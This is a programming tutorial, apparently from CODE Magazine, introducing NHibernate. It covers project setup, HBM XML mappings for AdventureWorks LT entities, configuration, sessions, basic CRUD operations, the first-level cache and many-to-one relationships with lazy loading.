when you start authoring NHibernate XML documents and provide assistance. Setting Up a Project to Use NHibernate Once you have obtained all the binaries, create a new solution in Visual Studio and add two new projects: A class library project and a console application project. Add a reference from the console project to the class library project. Add a reference to the console application project to NHibernate.dll from the folder in which you unzipped the NHibernate binaries. I chose a console application because it is the easiest path to get started and involves the least amount of code. Unfortunately it’s not that useful, so it won’t help you in your real work. However, I think it will get the concepts across faster by not having to mess with other concerns such as Windows Forms or Web requirements. The next step to getting started with NHibernate is to begin mapping your objects to the database schema. This step is necessary to fulfill the “mapping separate from the model” feature I talked about earlier. NHibernate allows for mapping of many sophisticated situations both from the object and database schema perspectives. Before I proceed, however, I think it is important to stop and talk a little about the domain and then I’ll resume with how to create the domain mappings and finally how to bootstrap NHibernate and begin using it. The Domain: AdventureWorks LT The diagram in Figure 1 illustrates the portion of the AdventureWorks LT relational model that I’ll map in this article. The center of the model is the Customer table. Customers have Addresses and Sales Orders. Each Sales Order has a Header with multiple Detail records. You should note that I italicized and capitalized certain words in that last sentence. This is because those words are important to the domain as they represent the key entities as well as describe the relationship between. In this article, I’ll show how to map these entities and their relationships with NHibernate as well as how to use NHibernate to persist and retrieve them. Basic Entity Mapping NHibernate has the ability to map an object to multiple tables, to a view, and many other combinations. Perhaps the most common type of mapping is simply mapping one object to one table. This is called a “class per table” mapping. The “Address” table in the AdventureWorksLT database is a good place to start as you can map it using the class per table style. Creating the Entity Object Let’s start by creating an “Address” class in the .NET project. Create a folder in your project called “Domain” and then add a new class to that folder called “Address.” NHibernate can map properties to columns even when their names are different. In this case, however, the Address table has .NET-friendly column names to keep things simple. Create properties in your Address class that match the names and types of the columns in the Address table. Mark each property with the “virtual” keyword (or “Overridable” if you’re using VB). This may seem odd. I’ll explain why I want to use virtual/Overridable later in this article. When you’re done, your Address class should look something like: public class Address { public virtual int AddressID {get; set;} public virtual string AddressLine1 {get; set;} public virtual string AddressLine2 {get; set;} public virtual string City {get; set;} public virtual string StateProvince {get; set;} public virtual string CountryRegion {get; set;} public virtual string PostalCode {get; set;} public virtual DateTime ModifiedDate {get; set;} } You should note that I did not include a property for the rowguid column in the Address table. This is because rowguid is a special column for SQL Server and should, generally speaking, not be tampered-with by client applications. SQL Server uses it for replication and other internal processes. SQL Server manages this column itself, so you don’t need to map it or otherwise be concerned about it. Creating the NHibernate HBM XML Mapping File NHibernate’s primary mechanism for mapping objects to relational structures is XML. I usually refer to these XML mapping documents as “HBM” or “HBM XML” files. HBM stands for “HiBernate Mapping.” NHibernate’s configuration can take XML mapping documents in a number of different forms (a direct XmlDocument object passed in through its configuration API, a reference to a file on the disk, an assembly-embedded resource, etc.). The most common way to pass mappings to NHibernate, however, is to have your XML documents embedded as resources in an assembly. I usually embed the XML documents into the same assembly as the one where my entity objects are located, but that is certainly not a requirement. For now, let’s keep things simple. Make a folder in your project called “Mappings.” Create a new XML document file in that folder called “Address.hbm.xml.” The name is not necessarily important, but NHibernate will automatically find all *.hbm.xml embedded resources. If you name your mapping documents differently, you will have to write some extra code to help NHibernate find them. For now, let’s stick with the default convention: *.hbm.xml. It’s also worth mentioning that I prefer the style of having one HBM XML file for each entity. This is not required, however. You can have one big XML file with all your entity mappings in it or you can break it up by whichever grouping you prefer. After you’ve added the XML file to the project, you need to mark it as an “embedded resource” so the compiler will embed the XML file into the compiled assembly. Select the XML file in Solution Explorer and press F4 to bring up the properties window. Change the “Build Action” property from “Content” to “Embedded Resource.” This is an important step and one that is often forgotten. If you make this common mistake, NHibernate will throw errors and complain that it can’t seem to find any mapping for the entity mapping that is missing. Once you have the first XML file set up correctly, I recommend adding new XML documents by copying and pasting the original XML document. Visual Studio will also copy properties like “Build Action.” In this way, you will ensure that you never accidentally forget to change the “Build Action” and save yourself a lot of headaches. Every HBM XML document starts with the “hibernate-mapping” element. To map a class to a table you use the “class” element. Both the hibernate-mapping and class elements take a number of attributes/options-some of which I’ll get to later-but for now I’ll stick to the basics to get going faster. If your database engine supports the concept of multiple schemas in a single catalog (for example, SQL Server 2005’s “schema” concept), then you will need to configure your mapping to tell NHibernate this. In the LT example, the Address table is in the “SalesLT” schema. Add the “schema” attribute, with value “SalesLT”, to the <hibernate-mapping> element. The basic shell of your mapping between the Address class and table should now look something like this: <?xml version="1.0" encoding="utf-8" ?> <hibernate-mapping <class name="Address"> </class> </hibernate-mapping> Mapping the ID of the Entity Remember how I previously wrote that every entity has a unique identifier? In the AdventureWorks LT database, the convention is to use SQL Server identity auto-number columns as the unique identifier/primary key. NHibernate needs to know this important piece of information as the ID of an entity is special compared with other data columns. To map the ID column of a table, use the <id> element. NHibernate needs to know you plan on generating IDs in your system. NHibernate can generate them for you (in the case of GUIDs) or NHibernate can defer to the database system to generate them (in the case of auto-number, sequences, and so on). So every <id> element needs a <generator> child element. To map the AddressID property to the AddressID column using the native database identity generator, you should use the following XML: <id name="AddressID"> <generator class="native" /> </id> As a side note, most RDBMS have a “native” or preferred form of generating IDs. For Microsoft SQL Server, this is the identity auto-numbering system. For Oracle, sequences are generally used. Instead of specifically stating “identity” for the <generator> element (which explicitly ties your system to SQL Server), you can use the “native” generator which will instruct NHibernate to automatically use the preferred ID generation system for the underlying database platform. This is important if you ever plan on supporting more than one backend database platform. I have also found that, even if I only have plans to support one database platform, I may still use a different database for testing purposes. For example, if I want to test some particular aspect of my system that involves some database access, I may use an in-memory database like SQLite or Firebird, which is easier to set up and host for quick testing scenarios than SQL Server or Oracle. Mapping the Properties Next, I’ll show you how to map the rest of the properties to the rest of the columns on the Address table. You’ll map properties using the <property> XML element. For simple scenarios where the .NET property name matches the column name in the database, you can simply use the “name” attribute on the <property> element and NHibernate will match up correctly. Add a <property> element for each property in the Address class. When you’re done, it should look something like: <property name="AddressLine1"/> <property name="AddressLine2"/> <property name="City"/> <property name="StateProvince"/> <property name="CountryRegion"/> <property name="PostalCode"/> <property name="ModifiedDate"/> Now you have one entity and its associated mapping. You’re ready to begin using NHibernate to perform database operations with this entity. The full contents of the Address.hbm.xml file should now look like the contents of Listing 1. In the next section, I’ll show you how to bootstrap NHibernate and begin performing tasks. Bootstrapping NHibernate Now let’s switch back to the console application project. I’ll add the NHibernate XML configuration file and then I’ll write some code to bootstrap NHibernate to the point where I actually connect to a database and begin performing operations. NHibernate Configuration File In the console application project, add a new XML file called “hibernate.cfg.xml.” Again, this is the default name NHibernate will look for. It isn’t required as there are several ways of configuring NHibernate. This is the easiest and involves the least amount of code, so it’s perhaps the best to start with. Select this new file in Solution Explorer and press F4 to open the properties window for this file. Change the “Copy to Output Directory” property to “Copy Always.” Every time you compile, Visual Studio will copy this XML file to the output folder alongside the EXE file. Next, add a reference to your other project-the one used in the previous section to add the Address entity and its associated mapping HBM file. NHibernate requires a minimum of four settings to operate: - The connection provider to use. - The SQL dialect of the database engine. - The driver to use for interacting with the database. - The connection string to use for connecting to the database. The connection provider (property name “connection.provider”) is always “NHibernate.Connection.DriverConnectionProvider.” This is an extensibility point for NHibernate which is why it’s a setting and not hard coded. Extending NHibernate is a very advanced topic and beyond the scope of this article. For now, I’ll use the value mentioned above. The SQL dialect translates NHibernate’s intentions into actual SQL statements, accounting for the various peculiarities and non-standard SQL quirks of the database engine and version. Specify this property using the “dialect” key. For SQL Server 2005, the dialect is “NHibernate.Dialect.MsSql2005Dialect.” The driver manages the underlying Connection object (i.e., System.Data.SqlClient.SqlConnection), command objects, data readers, etc. This property’s key is “connection.driver_class” and, for SQL Server, the default is “NHibernate.Driver.SqlClientDriver.” The connection string should be familiar to anyone who’s done any ADO.NET programming. This is the connection string which NHibernate passes to the Connection object to initiate the connection to the database server. It uses the standard ADO.NET connection string format. NHibernate does not tamper with this at all. It will pass it directly to the SqlConnection object (for example). The “connection.connection_string” key identifies this property. - Now that you have a good idea about what the four required configuration parameters for NHibernate are, you can create the XML configuration document. It should look something like Listing 2. Building the Configuration and SessionFactory Everything is in place now to start using NHibernate. Just to recap, you should have the following things: - Two projects in a Solution, one being a console application project. - An entity class (Address). - An XML mapping (address.hbm.xml). - A configuration file (hibernate.cfg.xml). In your Main() method in your console application project, instantiate a new Configuration() object, instruct it to use the hibernate.cfg.xml file for its configuration, point it to your HBM document, and then build a session factory in preparation for creating a new session. Listing 3 shows the start of the sample console application I used to write this article. In this example, I have some basic error handling and some handling for when the application ends (so that the console window doesn’t disappear when it’s finished). The main meat is in the middle-where the configuration is loaded, mappings added, and the session factory created. You only need to perform these tasks once per application at startup. Once you have acquired a session factory, maintain a reference to it for the duration of the application lifetime. The session factory is thread-safe so you can call it from multiple threads or web requests in the context of a web application. You should note that individual sessions created by the factory are not thread-safe. Be careful to ensure that you only access a given session from a single thread and/or web request at a time. Creating a Session and Connecting to the Database From the session factory you just created in the previous section, call the “OpenSession” method to acquire a new session. At this point, the session is essentially a live connection to the database and you should treat it as such for the purposes of connection pooling, memory leaks, performance, and other such concerns. When you open a session, for various reasons, it may not actually connect to the database at first. Instead it may wait until the first time it needs to actually connect. As I said before, treat it as though it is connected by making sure you wrap it with the using() block in C# or a Try/Finally block in VB. Also, you should always perform database operations with NHibernate through a transaction. Any time you open a session, you should be concerned about transaction management. You can use one transaction / session or multiple transactions per session, but you should always be performing operations within the context of a transaction. Consider the following code example of opening a session and starting a new transaction while preventing connection leaks by using the using() block: using (var session = factory.OpenSession()) using (var xaction = session.BeginTransaction()) { //TODO: work with session and transaction here } Basic Create, Retrieve, Update, and Now that you have an open session and an active transaction, you can begin performing interesting operations such as saving an entity, retrieving it, deleting it, etc. Let’s start by saving a new address. Saving an Address Saving an entity is simple with NHibernate once you have a session open. Simply call the “Save” method on the session and pass in the entity to be saved. var address = createNewAddress(); session.Save(address); xaction.Commit(); var lastAddressID = address.AddressID; NHibernate will not actually insert the row into the database table at this point. It will batch up commands. The session will automatically “flush” a batch to the database when it needs to, if you explicitly call Flush() on the session, or whenever you commit a transaction. I’ll cover how the semantics of batching and flush work later in this article. For now, simply commit the transaction to actually flush an address to the database. At the end of the using() block, the session and transaction will close, releasing the connection to the database back to the ADO.NET connection pool. If you look at the contents of the Address table in the database, you should now see a new row representing the Address you just saved. Congratulations, you’ve successfully saved your first record using NHibernate! After having saved an entity, NHibernate automatically works with the database to retrieve the ID that the database assigned to that entity and assigns it to the entity’s <id>-mapped property. As an experiment, print out the AddressID of the address entity before and after you save and commit it and you’ll notice it changes from 0 to whatever the next identity number is. Retrieving an Address by Its ID Retrieving an entity by its ID is also simple. The Load() method on the session will retrieve an entity by its ID and throw an exception if it does not exist in the database. The Get<T>() (Get(Of T)() for VB) method will retrieve the entity or return null if none was found. I prefer to use the Get method since I prefer not to have throw or trap exceptions for conditions that can otherwise be detected by an “if” statement (seeing as how throwing and catching exceptions is an expensive operation). For the sake of this example, imagine that this is a separate web request and the user has clicked on a link to load the Address she just saved in the previous request. First, look at the row in the database and copy its AddressID value. Next, in the code, open a new session from the SessionFactory. Next, call the Get<Address>(id) method and pass in the AddressID you just looked up in the database. Assign the return value of the Get call to a variable. Finally, print the AddressLine1 value to the console to verify it all worked. After you’re done, your code should look something like this: using (var session = factory.OpenSession()) using (var xaction = session.BeginTransaction()) { var address = session.Get<Address>(lastAddressID); //TODO: Do something with the address here xaction.Commit(); } If you got a NullReferenceException, you probably had the wrong AddressID or there was some other problem. Otherwise, you should see the value you originally entered for AddressLine1 when you saved that address. Updating an Address Next, let’s take the address you just retrieved from the database, change a property, and update it. Simply modify the AddressLine1 property (or any property except AddressID), and then call the Update() method on the session. Consider this example: address.AddressLine1 = "334 Smith Street"; session.Update(address); xaction.Commit(); Now check the values in the database and you should see that they have changed. Deleting an Address Hopefully by now you’re getting the hang of the basics. Deleting an entity is just as easy as the rest of the CRUD operations. Simply call the Delete() method and pass in the Address to delete. session.Delete(address); xaction.Commit(); A Little More About the Session First-level Object Cache Before I proceed on to more complex scenarios and operations, I want to cover a few more important aspects of the Session object. The session maintains a cache, called the First Level Cache, of all the objects it has saved or retrieved. This cache lasts the duration of the session. You can “evict” an individual object from the cache or clear everything from it. Evicting and clearing the cache is not something you have to worry about for most regular applications and only comes into play for specific scenarios. The reason the session caches objects is because you may retrieve the same object again or it may be related to another object you’re retrieving and so the session recognizes objects and IDs it already has loaded and prevents excessive and unnecessary database calls. Most of time, this is a benefit and you won’t have to think or worry about it. Addressing Some Questions This is usually the point where, when I’m introducing someone to NHibernate, a million questions pop up. I’m guessing that a million questions are swirling around in your mind about all this right now. What about max length on varchar fields? What about custom/user types? What about aggregate functions? What about complex queries? What if I want to delete an entity by its ID without having to load it first? What about projection queries (selecting a subset of fields from one or more tables instead of a single entity from one table)? What about transaction management? What about database X feature Y? What about default values for columns (like the ModifiedDate on the Address table)? What about user-defined types? NHibernate doesn’t address every situation you’ll run into when interacting with the database, but it does handle most-including the questions above. Unfortunately, I won’t get to all of them in this article. I hope, however, that this article will get you up to speed on the basics and enable you to be able find more specific information about NHibernate as you evaluate it for your project. More than Just CRUD So far, I’ve only shown basic CRUD operations with NHibernate. NHibernate can do much more than CRUD, though. Some of NHibernate’s greatest features come into play when managing the relationships between multiple entities. One of the more common types of relationships is the many-to-one relationship. A good example of this in the AdventureWorksLT database is the SalesOrderHeader table foreign key relationship to Customer. You can relate many sales orders to one customer-thus a many-to-one relationship. From now on, I’ll call many-to-one relationships “MTO” for brevity. The converse of this relationship is a one-to-many (OTM)-one customer can have many sales orders. For now, I’ll start with the MTO side since it’s easier to map with NHibernate and show examples. After that, I talk about the OTM side. Many-to-One Relationships Let’s start by creating the Customer object the same way you did the Address object. Remember: leave out the rowguid column to keep things easier. When you’re finished, it should look something like this: public class Customer { public virtual int CustomerID {get; set;} public virtual int NameStyle {get; set;} public virtual string Title {get; set;} public virtual string FirstName {get; set;} public virtual string MiddleName {get; set;} public virtual string LastName {get; set;} public virtual string Suffix {get; set;} //... and so forth } Next, create the SalesOrderHeader object in a similar fashion. The SalesOrderHeader table has a few interesting features on it that, for now, you should just ignore because they are not relevant to this topic. For now, ignore the ShipToAddressID, BillToAddressID, SalesOrderNumber, TotalDue, and rowguid columns. Remember the basic goal of this exercise is to avoid having to, in the main business code, worry about persistence concerns. Imagine if you were building your app and didn’t have to worry about a database behind it. How would you structure SalesOrderHeader differently? For starters, you probably wouldn’t have a “CustomerID” property, you’d probably have a “Customer” property and its type wouldn’t be Int32, it would simply be “Customer.” You’ll tell NHibernate in the HBM XML how to map the CustomerID column to the Customer property later. Here’s what your SalesOrderHeader class should look like: public class SalesOrderHeader { //... other value properties public virtual Customer Customer { get; set; } } Mapping Customer and SalesOrderHeader Mapping the Customer object is straightforward and should look like the Address mapping, only with different names and properties. Mapping SalesOrderHeader is similarly straightforward except for a few fields. First, SalesOrderNumber and TotalDue are computed columns in SQL Server and either should not be mapped or should be mapped as read only. For now, to keep things simple, just leave these fields out of your mapping and your class. The “Customer” property is a little different than the normal fields in the table. As I mentioned earlier, the relationship between SalesOrderHeader and Customer is an MTO, so you need to use a new tag (instead of <property>): <many-to-one>. The <many-to-one> tag needs the property name, the column name of the foreign key in the table (only if it is different from the property name which, in our case, it is). Add the <many-to-one> tag to your mapping. It should look something like this: <class name="SalesOrderHeader"> <id name="SalesOrderID"> <generator class="native" /> </id> <!-- <property> tags here ... --> <many-to-one </class> Saving and Updating MTO Relationships Once you have Customer and SalesOrderHeader created and mapped, you should be able to perform the standard Save/Get/Update/Delete operations just like you did with Address earlier. At this point, in order to create a new Customer and SalesOrderHeader, relate them both, and have them both saved, you’ll have to call Save() on both object instances. NHibernate can do some more intelligent things and cascade-save related entities if you tell it to. I’ll get to the more advanced functionality in a little bit. For now, to relate two objects, you would write code like this: var customer = createNewCustomer(); session.Save(customer); var order = createNewOrder(); order.Customer = customer; session.Save(order); xaction.Commit(); Retrieving the Related Object When you retrieve the SalesOrderHeader you just saved, NHibernate will, by default, not get the Customer. Instead, it will use a “proxy” object or a ghost of the Customer. The Customer property on SalesOrderHeader will not be null, but no data is actually loaded yet. As soon as you access any properties on the related Customer proxy, NHibernate will, at that moment, execute a SELECT statement to retrieve the Customer. This all happens transparently and the code accessing the SalesOrderHeader and/or Customer objects never needs to know that this is happening. This is what I referred to earlier as transparent lazy loading and is an important feature of NHibernate and actually a key differentiator between other O/RM frameworks-many of which do not support transparent lazy loading. Note that I said, this all happens by default. Certain relations may call for no lazy loading (for example, always load the Customer whenever you load the SalesOrderHeader). You can, in specific situations, tell NHibernate to get a related object or related objects when getting another object. For example, you might want to load a collection of objects for one specific query with lazy-loading disabled. This concludes part 1 of this article about using HNibernate. You have learned why you want to use NHibernate, techniques for configuring NHibernate, how to map your objects to your data entities, and how to load basic objects. In part 2 you'll learn more advanced NHibernate concepts including configuring more advanced object relationships, managing lazy loading, and concepts for sorting and filtering data using NHibernate.
http://www.codemag.com/article/0906081
CC-MAIN-2018-05
refinedweb
7,298
53.92
We are about to switch to a new forum software. Until then we have removed the registration on this forum. Hey guys, I'm working on a code which if written correctly should be able to print the value of my potentialmeter on processing. And then I dont mean with a flowing colour screen, that I can find on the internet. I want to print on the screen the number of the potentialmeter, and when I turn the wheel it, the number on processing should change. I think my code does connect to the potentiometer and does print it on processing, but it keeps overwriting, the numbers dont change. It just literally writes over the previous numbers. My arduino code : void setup() { //initialize the serial communication: Serial.begin(9600); } void loop() { //send the value of analog input 0: Serial.println(analogRead(A0)); //wait a bit for the analog-to-digital converter to stabilize after last //reading: delay(2); } My processing code import processing.serial.*; Serial myPort; PFont myFont; float val; int[] pin_val; int lf = 10; boolean received; float inByte = 0; void setup() { size(325,400); fill(51,153,255); rect(10,10,300,150); myFont = createFont("Arial", 18); textFont(myFont, 18); println(Serial.list()); myPort = new Serial (this, Serial.list()[0], 9600); pin_val = new int[0]; val = 0; received = false; } void draw() { textSize(30); fill(255,0,0); textAlign(CENTER); textFont(myFont, 18); text("received: "+inByte, 160,50 ); //This is where I believe my fault is. fill(255,255,255); ellipse(162.5,260,80,80); } void serialEvent (Serial myPort) { String inString = myPort.readStringUntil('\n'); if (inString!= null) { // trim off any whitespace; inString = trim(inString); //convert to an int and map to the screen height: inbyte = float(inString); println(inByte); inByte = map(inByte, 0, 1023, 0, height); } } I know there is a blue rectangle and a white ellips, but that's part of my homework. Answers Please edit your post (gear icon) and fomat the code correctly by highlighting your code and pressing Ctrl+o (indent four spaces). Then people can actually read it, copy-paste to test, and help you. You aren't clearing the screen each frame, so you are drawing on top of your old text. Here is a wrong example: } Instead do this: } See background()in the reference: Please format your code. Check previous related posts: For instance: Kf I tried multiple times to get the code clear to read, but it won't work. it'll just appear betweenthese things. nothing else @jeremydouglas that solved it thankyou! But now I do have another question, the printed number has a maximum of 400, is this normal or should it also be able to print te max 1023 of the potentialmeter? And in my comment it does work. Great. ( please tag @jeremydouglass -- ss ) Re: Look at your code -- I think, it is almost impossible to tell what is commented out and what isn't because you haven't indented each code line by at least four spaces and left an extra blank line above and below the code block. You received a number between 0 and 1023. Then you used map()to stretch that number to being between 0 and height. What is height? @jeremydouglass SS! yes that height part is still of a previous part. In that piece the value of the potmeter was a sort of wave in processing. Since I lack of good arduino and processing skills, I coppied what I thought whas usefull and it mostly it works out quite well. So to be honest, I dont know what the use of height is . @jeremydouglass since you have helped me very well, could you perhaps help me a little more? Because now I have to add a switch (button) to this programm. If you push the button the ellips has to turn green and else the button is just white. for Arduino code I used the StandarFirmata file which can be found in arduino. I read somewhere that was necessary. for proccesing code I have this The program won't run because it says the port is busy, I get that because at the top I connected 'Arduino' also to port 0. But I dont know how to do it otherwise, since both my button and my potmeter are connected to that port. Please format your code. Edit your post (gear on top right side of any of your posts), select your code and hit ctrl+o. Leave an empty line above and below your block of code. Details here: Please edit your post... It is really hard to read your code. Unfortunately your previous code doesn't seem to be properly formatted either. Your button and potentiometer are connected to the same arduino, right? Then you need to open the port only once. You are opening the same port twice (and using different speeds). Both are a big no no. In your case, I will suggest you write a small program that works with a push button first. THen write another program that uses the potentiometer. Finally, merge the two programs into a third program. This exercise will help you understand the software and routines you need to use with each of your hardware components. It also helps by making sure each component is working by itself. This will save lots of debugging... specially because we don't have your hardware to run your code and test it. Kf @DeDaymar -- I'm glad it was helpful. People have asked you several times to edit and correctly format the code in your posts, and given you instructions on how to do so. Please, please do so if you would like further help from me on this forum. @kfrajer @jeremydouglass okay so I finally got it. Sorry it took so long @kfrajer I did, that's how I figured out what arduino program to use. And I understand that it's a no go to connect both the button and the potentiometer to the same port, but the button has to be connected as well.. Guys I figured it out. My code works! I used an example from processing called arduino_input. I changed that code to how I needed it to be and now it works perfectly. Both my button and my potentialmeter do what I want. So thank you very much for your help, both. I do have more stuff I have to make, so I might be back but for now I am done. Congratulations, @DeDaymar! Thanks also for sharing your solution with the forum. Great to hear it is working. Just to clarify, I was referring no to open the same port of your computer twice. If you issue a second open command on an already opened port, you will get an error of "port already open" or along those lines. Kf
https://forum.processing.org/two/discussion/24915/read-potentiometer-serial-from-arduino-on-processing
CC-MAIN-2019-18
refinedweb
1,141
73.68
29 February 2012 11:01 [Source: ICIS news] TOKYO (ICIS)--?xml:namespace> A total of 1.34m tonnes of LDPE was shipped within Japan from January to December 2011, down 5% from 2010, according to the Ministry of Economy, Trade and Industry (METI). Among different applications of LDPE, demand for film production was the highest at 653,578 tonnes, a 9% decrease from the previous year, the data showed. A total of 190,164 tonnes of LDPE was exported in 2011, a 23% decline from 2010, according to the ministry. The country’s domestic shipments of PP decreased 7% year on year to 2.29m tonnes in 2011, while exports of the product fell 9% to 240,772 tonnes from the previous
http://www.icis.com/Articles/2012/02/29/9536790/japan-domestic-shipments-exports-of-primary-resins-fell-in-2011.html
CC-MAIN-2014-52
refinedweb
122
72.05
lupacarjie Newbie Poster 13 posts since Aug 2011 Reputation Points: 1 [?] Q&As Helped to Solve: 0 [?] Skill Endorsements: 0 [?] •Community Member 0 Hello, I created a simple number guessing game which thinks of a secret number from 1 to 100. It tells the user if his guess is high or low and finally stops after the secret number is equal to the user's input, it also notes down the number of tries. It then asks if the user wants to try again, but whenever it runs to play again, the number of tries add up to the previous result. What am I missing? Also, the setw() function doesn't seem to work. Thanks! #include <cstdlib> //directive for rand() function #include <time.h> // directive for random pick of number #include <iomanip> #include <iostream> using namespace std; int main(){ srand(time(0)); //changes the secret number int number; number = rand() % 100 + 1; //range of secret number 1-100 int guess; int tries = 1; int play = 1; pick: cout << setw(5) << "\nWelcome to the Guess the number game! " ; cout << setw(5) << "\nI'm thinking of a secret number from 1 to 100 " ; cout << setw(5) << "\nGuess it!\n\n" ; do { //loops until guess is equal to secret number cout << "\nEnter your estimate: "; cin >> guess; if (guess < number){ cout << "Higher!" << endl; tries = tries + 1;} else if (guess > number){ cout << "Lower!" << endl; tries = tries + 1;} else cout << "Your guess is right!" << endl; } while (guess != number); cout << "\n\nYou tried "<<tries<<" times " ; char g; cout << "\nTry Again? (y for yes or n for no): "; cin >> g; if(g !='n'){ srand(time(0)); play = play + 1; system("cls"); goto pick;} else { cout << "\nNumber of game plays is "<<play<<"\n\n" ;} system("PAUSE"); return 0;}
https://www.daniweb.com/software-development/cpp/threads/397476/simple-number-guessing-game
CC-MAIN-2015-27
refinedweb
289
81.73
perlmeditation Roy Johnson Recursive algorithms are often simple and intuitive. Unfortunately, they are also often explosive in terms of memory and execution time required. Take, for example, the N-choose-M algorithm: <code> # Given a list of M items and a number N, # generate all size-N subsets of M sub choose_n { my $n = pop; # Base cases return [] if $n == 0 or $n > @_; return [@_] if $n == @_; # otherwise.. my ($first, @rest) = @_; # combine $first with all N-1 combinations of @rest, # and generate all N-sized combinations of @rest my @include_combos = choose_n(@rest, $n-1); my @exclude_combos = choose_n(@rest, $n); return ( (map {[$first, @$_]} @include_combos) , @exclude_combos ); } </code> Great, as long as you don't want to generate all 10-element subsets of a 20-item list. Or 45-choose-20. In those cases, you will need an iterator. Unfortunately, iteration algorithms are generally completely unlike the recursive ones they mimic. They tend to be a lot trickier. <p> But they don't have to be. You can often write iterators that look like their recursive counterparts — they even include recursive calls — but they don't suffer from explosive growth. That is, they'll still take a long time to get through a billion combinations, but they'll start returning them to you right away, and they won't eat up all your memory. <p> The trick is to create iterators to use in place of your recursive calls, then do a little just-in-time placement of those iterator creations. <readmore>So let's take a first stab at choose_n. First, our base cases are going to be subs that return whatever they were returning before, but after returning those values once, they don't return anything anymore: <code> sub iter_choose_n { my $n = pop; # Base cases my $once = 0; return sub {$once++ ? () : []} if $n == 0 or $n > @_; my ($first, @rest) = @_; return sub {$once++ ? () : [$first, @rest]} if $n == @_; </code> Apart from the iterator trappings, we've got essentially what we had before. Converting the map into an iterator involves some similar work, but the parallels are still pretty obvious. We exhaust the first iterator before turning to the second: <code> # otherwise.. my $include_iter = iter_choose_n(@rest, $n-1); my $exclude_iter = iter_choose_n(@rest, $n); return sub { if (my $set = $include_iter->()) { return [$first, @$set]; } else { return $exclude_iter->(); } } </code> We now have a recursively-defined iterator that wasn't a heck of a lot more complex than our original algorithm. That's the good news. The bad news is: it's still doubly recursive, O(2^N) in space and time, and so will take a long time to start generating data. Time for a little trick. Because we don't use $exclude_iter until we've exhausted $include_iter, we can delay defining it: <code> # otherwise.. my $include_iter = iter_choose_n(@rest, $n-1); my $exclude_iter; return sub { if (my $set = $include_iter->()) { return [$first, @$set]; } else { $exclude_iter ||= iter_choose_n(@rest, $n); return $exclude_iter->(); } } } </code> Now our code is singly recursive, O(N) in space and time to generate an iterator, and that makes a big difference. Big enough that you probably won't need to go to the trouble of coming up with an O(1) truly iterative solution. <p> Of course, if you complete the iterations, eventually you will have generated those 2^N subs, and they'll clog up your memory. You may not be concerned about that (you may not be expecting to perform all that many iterations), but if you are, you can put a little code in to free up exhausted iterators: <code> # otherwise.. my $include_iter = iter_choose_n(@rest, $n-1); my $exclude_iter; return sub { if ($include_iter and my $set = $include_iter->()) { return [$first, @$set]; } else { if ($include_iter) { undef $include_iter; $exclude_iter = iter_choose_n(@rest, $n); } return $exclude_iter->(); } } } </code> </readmore> <b>Update:</b> See [459604|my response to Kelan] for a recipe for conversion from recursion to iterator. <!-- Node text goes above. Div tags should contain sig only --> <div class="pmsig"><div class="pmsig-300037"> <hr> <small><b>Caution:</b> Contents may have been coded under pressure.</small> </div></div>
https://www.perlmonks.org/?displaytype=xml;node_id=458418
CC-MAIN-2020-45
refinedweb
677
58.32
A library for building decoders using the pipeline (|>) operator and ordinary function calls. It's common to decode into a record that has a type alias. Here's an example of this from the object3 docs: type alias Job = { name : String, id : Int, completed : Bool } point : Decoder Job point = object3 Job ("name" := string) ("id" := int) ("completed" := bool) This works because a record type alias can be called as a normal function. In that case it accepts one argument for each field (in whatever order the fields are declared in the type alias) and then returns an appropriate record built with those arguments. The objectN decoders are straightforward, but require manually changing N whenever the field count changes. This library provides functions designed to be used with the |> operator, with the goal of having decoders that are both easy to read and easy to modify. Here is a decoder built with this library. import Json.Decode exposing (int, string, float, Decoder) import Json.Decode.Pipeline exposing (decode, required, optional, hardcoded) type alias User = { id : Int , email : String , name : String , percentExcited : Float } userDecoder : Decoder User userDecoder = decode User |> required "id" int |> required "email" string |> optional "name" string "(fallback if name not provided)" |> hardcoded 1.0 In this example: decodeis a synonym for succeed(it just reads better here) required "id" intis similar to ("id" := int) optionalis like required, but if the field is not present, decoding does not fail; instead it succeeds with the provided fallback value. hardcodeddoes not look at the provided JSON, and instead always decodes to the same value. You could use this decoder as follows: Json.Decode.decodeString userDecoder """ {"id": 123, "email": "sam@example.com", "name": "Sam Sample"} """ The result would be: { id = 123 , email = "sam@example.com" , name = "Sam Sample" , percentExcited = 1.0 } Alternatively, you could use it like so: Json.Decode.decodeString userDecoder """ {"id": 123, "email": "sam@example.com", "percentExcited": "(hardcoded)"} """ In this case, the result would be: { id = 123 , email = "sam@example.com" , name = "(fallback if name not present)" , percentExcited = 1.0 } [ ][team] [team]:
https://package.frelm.org/repo/84/1.1.0
CC-MAIN-2019-30
refinedweb
339
55.34
There are two strings. We need to find if one string is a rotation of the other. If yes then how many places it was rotated. The solution is pretty straightforward. I will describe two ways in this post. First Method Let us assume we have two strings “hello” and “llohe”. Original String 0 1 2 3 4 +-----+-----+-----+-----+-----+ | h | e | l | l | o | +-----+-----+-----+-----+-----+ 3 characters rotated right 0 1 2 3 4 +-----+-----+-----+-----+-----+ | l | l | o | h | e | +-----+-----+-----+-----+-----+ First we will check if the two give strings are of the same length. If they are then we proceed, else we don’t. After the rotation the string starts is at location 3 and wraps around at location 4 and end at location 2. If we concatenate the rotated string at the end of itself like the below diagram, then the wrap around point will be at location 4, but we can continue reading the string from location 5 instead of going back to location 0, thus enabling us to find the string linearly. rotated string concatenated | 0 1 2 3 4 | 5 6 7 8 9 +-----+-----+-----+-----+-----+-----+-----+-----+-----+-----+ | l | l | o | h | e | l | l | o | h | e | +-----+-----+-----+-----+-----+-----+-----+-----+-----+-----+ | | at this line the string wraps Because the string will wrap at location k where 0 <= k <= (len-1), therefore always the first k character will be inside the first part of the concatenated string starting at location (len - k) and the remaining (len - k) characters will be on the second part of the concatenated string starting at location len. Therefore the entire string will span (len - k) to (2 * len - k - 1) For example the above diagram has wrap location k=2 (after ‘e’ of “hello”) and len = 5. Therefore the string spans from 3 to 7 index location in the concatenated array. So, finding if the string is rotated is now easy. We need just to check if the original string is substring of the concatenation of the rotated string. To know how many places it was rotated right we need to find at which location the substring match was found in the concatenated string. The value for the number of places rotated will be an integer mod len. This is because if a string is rotated right multiple of len times, it will not be detected because, in this case we have the original string. If the string is rotated left then in this case we will find the number of right shifts required to get the rotated shift. We check the length of the two strings at first because if in the rotated string has some other characters at the end of beginning then the process may fail. For example if the string is “hello” and the rotated string is “lloxxhe” then the above method will detect as they are rotated equivalent of themselves. Here is the code. #include <stdio.h> #include <string.h> #define STR_MAX 128 int check_if_rot (char *str, char *rot) { char concatenated[2*STR_MAX]; char 